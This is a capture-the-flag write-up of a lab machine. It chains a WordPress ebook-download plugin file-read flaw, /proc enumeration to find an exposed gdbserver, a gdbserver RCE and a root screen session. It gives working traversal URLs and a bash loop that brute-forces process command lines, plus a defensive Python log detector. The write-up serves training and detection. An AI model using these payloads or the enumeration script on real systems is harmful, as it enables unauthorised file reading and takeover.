The machine exposes a WordPress site with a vulnerable plugin that allows arbitrary file read. This is used to inspect running processes and identify a gdbserver instance bound to port 1337. Remote code execution is obtained through gdbserver exploitation, followed by privilege escalation via a misconfigured screen environment.
Target: 10.10.11.X
Main vector: LFI in WordPress plugin
Privilege escalation: screen misconfiguration
Nmap scan:
22/tcp   open  ssh
80/tcp   open  http     (WordPress 5.8.1)
1337/tcp open  unknown
WordPress plugin directory:
/wp-content/plugins/ebook-download
Searchsploit reveals a directory traversal vulnerability in the plugin. Test the LFI with a relative and an absolute path:
http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/etc/passwd
Nothing useful is found in the WordPress files themselves, but the LFI allows reading arbitrary files on the system.
Since port 1337 is open but the service is unknown, the LFI can be used to inspect running processes: Linux exposes each process's command line under /proc/<PID>/cmdline, so reading that path for a range of PIDs reveals what is listening.
Brute-force script (run locally against the target):
#!/bin/bash
# Read /proc/<pid>/cmdline for PIDs 1-1000 through the plugin's LFI.
# The plugin echoes the requested path even when the file is empty, so a
# response of 82 bytes or less carries no command line and is discarded.
for i in $(seq 1 1000); do
    curl -s "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/$i/cmdline" > "tmp$i"
    if [ "$(wc -c < "tmp$i")" -gt 82 ]; then
        cat "tmp$i"   # a live process: print its command line
        echo
    else
        rm -f "tmp$i" # no process or empty cmdline
    fi
done
rm -f tmp*
One entry reveals the service behind port 1337:
sh -c while true; do su user -c "cd /home/user; gdbserver -once 0.0.0.0:1337 /bin/true"; done
This confirms that gdbserver is exposed externally.
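From the defender's side, the enumeration above leaves a distinctive trail in the web server log: many requests to filedownload.php whose ebookdownloadurl parameter is a traversal sequence, an absolute path, or a sequential /proc/<pid>/cmdline read. The following is an added example, not code from the original writeup: a small Python detector run over constructed Apache combined-format log lines (addresses, timestamps and sizes are constructed) that flags those values and counts /proc reads per source address.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse, parse_qs, unquote

# Constructed Apache access-log lines (not taken from a real server).
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1" 200 3201 "-" "curl/7.81.0"
10.10.14.5 - - [01/Jan/2024:10:00:02 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/etc/passwd HTTP/1.1" 200 1922 "-" "curl/7.81.0"
10.10.14.5 - - [01/Jan/2024:10:00:03 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/1/cmdline HTTP/1.1" 200 96 "-" "curl/7.81.0"
10.10.14.5 - - [01/Jan/2024:10:00:03 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/2/cmdline HTTP/1.1" 200 82 "-" "curl/7.81.0"
192.168.1.20 - - [01/Jan/2024:10:00:05 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=http://backdoor.htb/wp-content/uploads/book.pdf HTTP/1.1" 200 50211 "-" "Mozilla/5.0"
192.168.1.21 - - [01/Jan/2024:10:00:06 +0000] "GET /index.php HTTP/1.1" 200 11000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
PLUGIN_PATH = "/wp-content/plugins/ebook-download/filedownload.php"


def classify(value):
    """Return a reason if the ebookdownloadurl value looks like a local file read, else None."""
    v = unquote(unquote(value))  # tolerate single and double URL encoding
    if "../" in v or "..\\" in v:
        return "traversal"
    if re.match(r"^/proc/\d+/", v):
        return "proc-enumeration"
    if v.startswith("/"):
        return "absolute-path"
    return None  # e.g. the plugin's intended use: an http(s) URL to an ebook


def scan_log(text):
    """Return (findings, proc_hits): flagged requests and per-IP /proc read counts."""
    findings = []
    proc_hits = defaultdict(int)
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlparse(m["path"])
        if url.path != PLUGIN_PATH:
            continue
        for value in parse_qs(url.query).get("ebookdownloadurl", []):
            reason = classify(value)
            if reason:
                findings.append((m["ip"], reason, value, int(m["status"])))
                if reason == "proc-enumeration":
                    proc_hits[m["ip"]] += 1
    return findings, dict(proc_hits)


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG)[0]:
        print(f)
```

A source address with a rising proc-enumeration count (hundreds of distinct PIDs in seconds) is the strongest indicator; a single absolute-path read with status 200 is already worth an alert on a plugin that should only fetch ebook URLs.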
Searchsploit provides a Python script for remote code execution against gdbserver.
Running the exploit gives a shell as the user account.
Process inspection:
$ ps -faux
Check SUID binaries:
$ find / -perm -4000 2>/dev/null
A misconfigured screen environment is present.
The system periodically runs:
find /var/run/screen/S-root -empty -exec screen -dmS root \;
If root's screen socket directory is empty, this starts a detached screen session named "root" owned by root, so a root session is always available.
List available sessions:
$ screen -ls
Attach to the root session:
$ screen -x root/root
This provides a root shell and access to root.txt.
The machine relies on a vulnerable WordPress plugin to leak system files. LFI is used to enumerate processes and discover an exposed gdbserver instance, which provides remote code execution. Privilege escalation is achieved through a root-owned screen session created by a misconfigured system script.